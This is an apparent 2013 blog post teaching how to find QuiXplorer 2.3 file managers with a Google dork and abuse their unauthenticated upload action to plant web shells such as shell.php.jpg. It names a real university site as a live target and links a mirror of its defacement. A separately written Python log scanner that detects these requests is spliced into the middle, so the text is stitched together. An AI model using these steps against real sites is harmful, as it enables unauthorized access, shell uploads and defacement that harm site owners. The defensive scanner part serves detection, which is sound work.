Friday 19 April 2013

QuiXplorer 2.3


Open Google.com and type this dork:
intitle:"QuiXplorer 2.3 - the QuiX project"



You'll see a lot of sites; some big websites are vulnerable too, like the Harvard University website.
Select any website from the search results.
Vulnerability




http://[localhost]/[path]/index.php?action=list&order=name&srt=yes





http://site.com/[xyz]/index.php?action=list&order=name&srt=yes
After going to this URL you will see a file manager.
You can upload your files here.


Find the row of icons on the page (edit file, create file, etc.) and click the last one; it is the upload option.







You can also upload directly by changing the URL: just put action=upload&order=name&srt=yes
after index.php?
Example:
http://site.com/[xyz]/index.php?action=upload&order=name&srt=yes
Shell examples: shell.php, shell.asp, shell.html, shell.php.jpg, shell.asp.jpg,
or any other supported file type.
Click on your file to view it.
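
Seen from the server side, the list, upload and view requests described above leave a recognisable trail in the web access log. The script below is an added example, not part of the original post: it flags those requests and correlates clients that used the upload action and also fetched a script-like file name (double extensions such as shell.php.jpg included). The combined log format, the function names and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined log format); not real traffic.
SAMPLE_LOG = """\
203.0.113.7 - - [19/Apr/2013:10:01:02 +0000] "GET /files/index.php?action=list&order=name&srt=yes HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [19/Apr/2013:10:01:40 +0000] "POST /files/index.php?action=upload&order=name&srt=yes HTTP/1.1" 200 734 "-" "Mozilla/5.0"
203.0.113.7 - - [19/Apr/2013:10:02:05 +0000] "GET /filestorage/shell.php.jpg HTTP/1.1" 200 88 "-" "Mozilla/5.0"
198.51.100.9 - - [19/Apr/2013:10:03:00 +0000] "GET /about.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
198.51.100.9 - - [19/Apr/2013:10:03:10 +0000] "GET /filestorage/report.pdf HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')
# A script extension anywhere in the file name also catches shell.php.jpg.
SCRIPT_EXT_RE = re.compile(r'\.(php\d?|phtml|asp|aspx|jsp)(\.|$)', re.I)

def classify(method, target):
    """Label one request, or return None if it is not of interest."""
    parts = urlsplit(target)
    query = parse_qs(parts.query)
    action = query.get("action", [""])[0].lower()
    # The file manager URLs on this page carry action, order and srt together.
    if parts.path.lower().endswith("/index.php") and {"order", "srt"} <= set(query):
        if action == "upload":
            return "file-manager upload" if method == "POST" else "file-manager upload form"
        if action == "list":
            return "file-manager listing"
    name = parts.path.rsplit("/", 1)[-1]
    if SCRIPT_EXT_RE.search(name) and name.lower() != "index.php":
        return "script-like file requested"
    return None

def scan(log_text):
    """Return (client, label, target, status) for every flagged log line."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        label = classify(m.group(2), m.group(3)) if m else None
        if label:
            findings.append((m.group(1), label, m.group(3), int(m.group(4))))
    return findings

def suspicious_clients(findings):
    """Clients that both POSTed to the upload action and fetched a script-like file."""
    uploaded = {ip for ip, label, _, _ in findings if label == "file-manager upload"}
    fetched = {ip for ip, label, _, _ in findings if label == "script-like file requested"}
    return sorted(uploaded & fetched)

if __name__ == "__main__":
    print(suspicious_clients(scan(SAMPLE_LOG)))
```

On a site that legitimately serves PHP or ASP pages the "script-like file requested" label alone is noisy; the correlated result from `suspicious_clients` is the signal to alert on.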
Live demo:
http://www.hcs.harvard.edu/~eac/letters/files/index.php?action=list&order=name&srt=yes

http://www.hcs.harvard.edu/~eac/letters/files/index.php?action=upload&order=name&srt=yes

http://www.hcs.harvard.edu/~eac/letters/filestorage/
I know some asshole will change the deface,
so it's a mirror of the defacement: http://attack-h.org/attack/?id=8452
